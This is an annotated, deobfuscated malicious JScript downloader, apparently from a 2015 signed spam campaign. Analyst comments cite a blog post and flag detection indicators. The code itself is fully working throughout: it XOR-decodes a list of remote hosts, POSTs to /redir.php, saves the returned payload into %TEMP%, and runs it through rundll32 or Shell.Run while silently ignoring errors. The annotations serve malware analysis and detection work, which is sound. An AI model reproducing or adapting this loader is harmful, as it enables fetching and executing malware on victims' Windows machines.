- Deobfuscated JS file. Related blog post: http://bartblaze.blogspot.com/2015/11/a-quick-look-at-signed-spam-campaign.html
- kTEIfdmieLe8 = "au0911"; // Implicit global (no var). Sent in every request body as the value of the "jndj" field; presumably a campaign or build tag -- confirm against the linked write-up.
- function kTEIfdmieLe5(kTEIfdmieLe6) { // Helper: creates a COM automation object from the ProgID string passed in.
- return new ActiveXObject(kTEIfdmieLe6) // Called below with "WScript.Shell", "MSXML2.XMLHTTP" and "ADODB.Stream"; ActiveXObject means the script expects a Windows script engine.
- };
- //// r6JLy1ijVPK
- //// 9eoOj
- //// b81c44zCnlGhKEGFeeq
- //// rMgXtx1jVd3fR2
- function kTEIfdmieLe(jhmpYYZvkuHWkW) { // Download-and-execute routine. The argument is appended to the POST body; an empty string selects the .dll/rundll32 path, anything else the .pdf/Shell.Run path.
- var kTEIfdmieLe4 = '9\x1a\x06f\x277w5T(*#E~###7\x19\x1d\x7f!7\x18#(,hd###2\x1d\x04~;)q?*9, \x0f#861\x0b\x0d}"4\x18/5&J\x198Y\x14\x0b\x14, \x5c\x06HB\x04\x1f\x06\x00\x1dg\x00\x05\x05\x0c=)\x1f\x10\x0bY\x0b\x1d\x0e\x17cB###.\x0d\x02`3/y8?\x276@\x0b;:ip###.\x1d\x09w$.e%5%<!\x1dZ4+7UO###3\x0b\x11s<%c 1\x27,#\x09Z86=UO###\x13, A\x13I]\x16wa'.split("###"); // "###"-separated list of XOR-obfuscated strings; each entry is decoded in the loop and used as the host part of the request URL.
- //// U2gGxa
- //// v5ziPM5Ffk
- if (jhmpYYZvkuHWkW == "") {
- qKLIFbykNgG = "." + "d" + "l" + "l"; // Implicit global: file extension for the saved download. The string is split up, which hides ".dll" from plain string searches.
- } else {
- //// vuh4k5cITe
- //// KGZT1FZBTij1b
- qKLIFbykNgG = "." + "p" + "d" + "f"; // Same trick for ".pdf".
- };
- for (var kRIBOVzKPU = 0; kRIBOVzKPU < kTEIfdmieLe4.length; kRIBOVzKPU++) { // Try each obfuscated host in turn.
- var veHnYKIWjraSp = kTEIfdmieLe5("WScript.Shell");
- //// nugznF3J0MgFJS6
- //// vAjJP
- sxyPxnzNV = veHnYKIWjraSp.ExpandEnvironmentStrings("%TEMP%") + "\\" + Math.round(1e8 * Math.random()) + qKLIFbykNgG; // Drop path: %TEMP%\<random integer><extension>. A numerically named .dll or .pdf appearing in %TEMP% is a file-system indicator for this sample.
- bypLmkq = false; // Implicit global flag: set to true once a download has been accepted (see the size check below).
- kTEIfdmieLe0 = kTEIfdmieLe5("MSXML2.XMLHTTP");
- kTEIfdmieLe0.onreadystatechange = function() { // Response handler; only acts on a completed request (readyState 4) that returned HTTP 200.
- if (4 == kTEIfdmieLe0.readyState && 200 == kTEIfdmieLe0.status) {
- var kTEIfdmieLe1 = kTEIfdmieLe5("ADODB.Stream");
- if (kTEIfdmieLe1.open(), kTEIfdmieLe1.type = 1, kTEIfdmieLe1.write(kTEIfdmieLe0.ResponseBody), 5e3 < kTEIfdmieLe1.size) { // Comma expression: open a binary stream (type 1), copy the response body into it, then continue only if it is larger than 5000 bytes.
- bypLmkq = true;
- kTEIfdmieLe1.position = 0;
- kTEIfdmieLe1.saveToFile(sxyPxnzNV, 2); // Option 2 overwrites an existing file at the drop path.
- try {
- if (jhmpYYZvkuHWkW == "") {
- veHnYKIWjraSp.Exec("rundll32 " + sxyPxnzNV + ", " + "DllRegisterServer"); // Loads the saved file through rundll32 and calls its DllRegisterServer export. A script host spawning rundll32 on a file under %TEMP% is the process-level behaviour to alert on.
- } else {
- veHnYKIWjraSp.Run(sxyPxnzNV, 1, 0); // Opens the saved .pdf with its associated handler (normal window, no wait); presumably a decoy document -- confirm against the linked write-up.
- };
- } catch (kTEIfdmieLe2) { // Empty handler: execution failures are silently ignored.
- //// uLwp7f7a4iYX4fySkVO
- //// AHd01oKSom
- };
- //// XEJSIvJ50CMlcrXQ8W
- //// l9CA25oIEjMlpDI5
- }
- kTEIfdmieLe1.close()
- }
- //// vBJw1enjn3Wd7NMI
- //// FKMKp9Sj
- };
- try {
- //// 7bMQQ7rV
- //// 0DHAGjKxwXc0lyCHv
- //// KiU13559
- //// IaR517JKlqQjx2OsWqJs
- var jjxjYcRoh = 'zXE2rg6lzkenHtwd'; // Repeating XOR key for the host list above.
- var ICJCJreUdAoEDtN = kTEIfdmieLe4[kRIBOVzKPU];
- for (var byQIHsqp = "", MCwLh6 = 0, MCwLh7 = 0; MCwLh6 < ICJCJreUdAoEDtN.length; MCwLh6++) byQIHsqp += String.fromCharCode(ICJCJreUdAoEDtN.charCodeAt(MCwLh6) ^ jjxjYcRoh.charCodeAt(MCwLh7)), MCwLh7++, MCwLh7 == jjxjYcRoh.length && (MCwLh7 = 0); // Decodes the current entry: each character is XORed with the key character at the same position, the key index wrapping to 0 at the end of the key.
- kTEIfdmieLe7 = "http://" + byQIHsqp + "/redir" + "." + "p" + "h" + "p"; // Request URL is http://<decoded host>/redir.php; the path is assembled from fragments.
- kTEIfdmieLe0.open("POST", kTEIfdmieLe7, false); // Third argument false: synchronous request, so send() returns only after the handler above has run.
- kTEIfdmieLe0.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
- kTEIfdmieLe0.send("JreoOoOUJvvFay=" + Math.random() + "&jndj=" + kTEIfdmieLe8 + jhmpYYZvkuHWkW); // Form body: a random value, the global tag, then the caller-supplied suffix. The fixed field names and the /redir.php path are usable as network signatures.
- } catch (kTEIfdmieLe3) { // Empty handler: a failed request is ignored and the loop moves on to the next host.
- };
- if (bypLmkq) { // Stop at the first host that returned an accepted download.
- break;
- };
- //// hqp4kZQUxwE
- //// KYrOhQ
- };
- };
- //// EQr7ksuiuwZdut45a
- //// jCStO3r
- kTEIfdmieLe(""); // First pass: empty suffix, so the download is saved as .dll and run through rundll32.
- kTEIfdmieLe("&ncm=sJzHYgdHnDZTwU"); // Second pass: the extra "ncm" form field is sent, and the download is saved as .pdf and opened.
- //// AEiSHdZq5
- //// nHsVUN2fzi